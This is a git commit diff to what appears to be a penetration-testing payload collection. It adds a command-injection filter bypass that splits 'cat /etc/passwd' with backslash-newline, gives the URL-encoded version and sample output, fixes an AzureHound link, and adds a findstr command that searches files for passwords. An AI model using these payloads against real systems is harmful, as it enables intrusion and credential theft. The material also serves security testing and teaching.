Active Directory Federation Services

This commit is contained in:
Swissky 2022-11-07 10:10:33 +01:00
commit e5ea12a3ca
3 changed files with 22 additions and 2 deletions

View File

@ -12,6 +12,7 @@
* [Filter Bypasses](#filter-bypasses)
* [Bypass without space](#bypass-without-space)
* [Bypass with a line return](#bypass-with-a-line-return)
* [Bypass with backslash newline](#bypass-with-backslash-newline)
* [Bypass characters filter via hex encoding](#bypass-characters-filter-via-hex-encoding)
* [Bypass blacklisted words](#bypass-blacklisted-words)
* [Bypass with single quote](#bypass-with-single-quote)
@ -136,6 +137,25 @@ You can also write files.
hello
```
### Bypass with backslash newline
Commands can be broken into parts by using backslash followed by a newline
```powershell
cat /et\
c/pa\
sswd
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
[SNIP]
```
URL encoded form would look like this:
```powershell
cat%20/et%5C%0Ac/pa%5C%0Asswd
```
### Bypass characters filter via hex encoding
Linux

View File

@ -226,7 +226,7 @@ Use the correct collector
* AzureHound for Azure Active Directory
* SharpHound for local Active Directory
* use [AzureHound](https://github.com/BloodHoundAD/AzureHound) (more info: [Cloud - Azure Pentest](Cloud%20-%20Azure%20Pentest.md/#azure-recon-tools))
* use [AzureHound](https://github.com/BloodHoundAD/AzureHound) (more info: [Cloud - Azure Pentest](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md#azure-recon-tools))
* use [BloodHound](https://github.com/BloodHoundAD/BloodHound)
```powershell

View File

@ -449,7 +449,7 @@ Extract `HKLM\Software\Policies\Microsoft Services\AdmPwd` from Windows Registry
```powershell
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /si password *.xml *.ini *.txt *.config 2>nul >> results.txt
findstr /spin "password" *.*
```